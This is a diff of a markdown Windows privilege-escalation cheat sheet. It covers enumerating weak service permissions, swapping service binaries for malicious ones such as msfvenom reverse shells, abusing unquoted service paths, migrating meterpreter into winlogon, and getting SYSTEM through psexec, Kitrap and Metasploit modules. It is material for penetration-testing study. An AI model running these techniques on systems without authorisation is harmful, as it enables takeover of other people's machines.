@@ -194,7 +194,7 @@ If you find a service that has write permissions set to `everyone` you can chang
First we need to find services. That can be done using `wmci` or `sc.exe`. Wmci is not available on all windows machines, and it might not be available to your user. If you don't have access to it, you can use `sc.exe`.
### WMCI
**WMCI**
```
wmic service list brief
@@ -212,7 +212,7 @@ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c
Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.
#### sc.exe
**sc.exe**
```cmd
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
@@ -231,9 +231,9 @@ Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
```
### Look for Weakness
**Look for Weakness**
What we are interested in is binaries that have been installed by the user. In the output you want to look for `BUILTIN\Users:\(F\)`. Or where your user/usergroup has `(F)` or `(C)` rights.
What we are interested in is binaries that have been installed by the user. In the output you want to look for `BUILTIN\Users:(F)`. Or where your user/usergroup has `(F)` or `(C)` rights.
Example:
@@ -245,7 +245,7 @@ BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
```
That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
That means your user has write access. So you can just rename the `.exe` file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
Here is a POC code for getsuid.
@@ -259,15 +259,15 @@ return 0;
}
```
We then compile it with our cross-compiler like this:
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using **wmic** or **net** the following way:
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using `wmic` or `net` the following way:
```
wmic service NAMEOFSERVICE call startservice
@@ -277,9 +277,9 @@ wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name].
```
The binary should be executed in the SYSTEM or Administrator context.
The binary should now be executed in the SYSTEM or Administrator context.
### Migrate the Meterpreter Shell
**Migrate the meterpreter shell**
If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:
@@ -287,13 +287,13 @@ If your meterpreter session dies right after you get it you need migrate it to a
wmic process list brief | find "winlogon"
```
So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.
So when you get the shell you can either type `migrate PID` or automate this so that meterpreter automatically migrates.
If the path contains a space and is not quoted, the service is vulnerable.
### Exploit It
**Exploit It**
If the path to the binary is
If the path to the binary is:
```
c:\program files\something\program.exe
c:\Program Files\something\winamp.exe
```
We can place a binary like this
@@ -322,7 +322,7 @@ We can place a binary like this
c:\program.exe
```
When the program is restarted it will execute the binary **program.exe**, which we of course control. We can do this in any directory that has a space in its name. Not only program files.
When the program is restarted it will execute the binary `program.exe`, which we of course control. We can do this in any directory that has a space in its name. Not only `program files`.
If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.
If the machine belongs to a domain and your user has access to `System Volume Information` there might be some sensitive files there.
First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables
First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the environment-variables
If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do **Run as Administrator** you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from **c:\windows\system32\cmd.exe**. This will give you a cmd with Administratos rights.
If you have a GUI with a user that is included in Administrators group you first need to open up `cmd.exe` for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do `Run as Administrator` you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from `c:\windows\system32\cmd.exe`. This will give you a cmd with Administrators rights.
From here we want to become SYSTEM user. To do this we run:
@@ -412,7 +412,7 @@ And then the cmd with SYSTEM privs pops up.
### Vista and Newer
You first need to upload PsExec.exe anad then you run:
You first need to upload PsExec.exe and then you run:
```
psexec -i -s cmd.exe
@@ -420,24 +420,21 @@ psexec -i -s cmd.exe
### Kitrap
On some machines the **at 20:20** trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI.
On some machines the `at 20:20` trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute `vdmaillowed.exe`. I think it only works with GUI.
```
vdmallowed.exe
vdmexploit.dll
```
## Using Metasploit
### Using Metasploit
So if you have a metasploit meterpreter session going you can run **getsystem**.
So if you have a metasploit meterpreter session going you can run `getsystem`.
### Unquoted Service Paths
```
exploit/windows/local/trusted_service_path
```
## Post modules
### Post modules
Some interesting metasploit post-modules
First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules.
@@ -447,8 +444,6 @@ use exploit/windows/local/service_permissions
